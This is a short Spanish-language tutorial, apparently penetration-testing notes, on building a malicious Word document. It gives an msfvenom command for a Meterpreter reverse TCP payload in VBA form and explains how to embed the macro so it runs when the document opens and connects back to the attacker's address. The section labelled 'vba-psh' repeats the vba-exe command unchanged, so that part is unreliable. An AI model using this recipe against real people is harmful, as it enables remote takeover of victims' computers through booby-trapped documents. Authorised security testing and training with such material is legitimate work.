Payload con msfvenom

En una máquina Kali, generamos el payload con msfvenom:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=TU_IP LPORT=4444 -f vba-exe

Cambia TU_IP por tu IP.

image.png

Como indica el output, este payload se divide en dos partes:

  1. La macro: hay que copiarla en el editor de macros del documento de Office. Esta macro se ejecutará al abrir el documento.
  2. Los datos: el volcado hexadecimal que aparece al final de la salida debe añadirse al final del contenido del documento.

<aside> ⚠️ Workbook_Open() abre Excel. Document_Open() abre Word.

EDITA EL CÓDIGO PARA USAR WORD.


EL PAYLOAD SE PEGA DIRECTAMENTE EN EL DOCUMENTO.

</aside>


Otro método: vba-psh

También podemos generar el payload usando vba-psh.

En una máquina Kali, obtenemos el payload con msfvenom:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=TU_IP LPORT=4444 -f vba-exe

Cambia TU_IP por tu IP.

image.png

<aside> ⚠️ Workbook_Open() abre Excel. Document_Open() abre Word.

EDITA EL CÓDIGO PARA USAR WORD.


EL PAYLOAD SE PEGA DIRECTAMENTE EN EL DOCUMENTO.

</aside>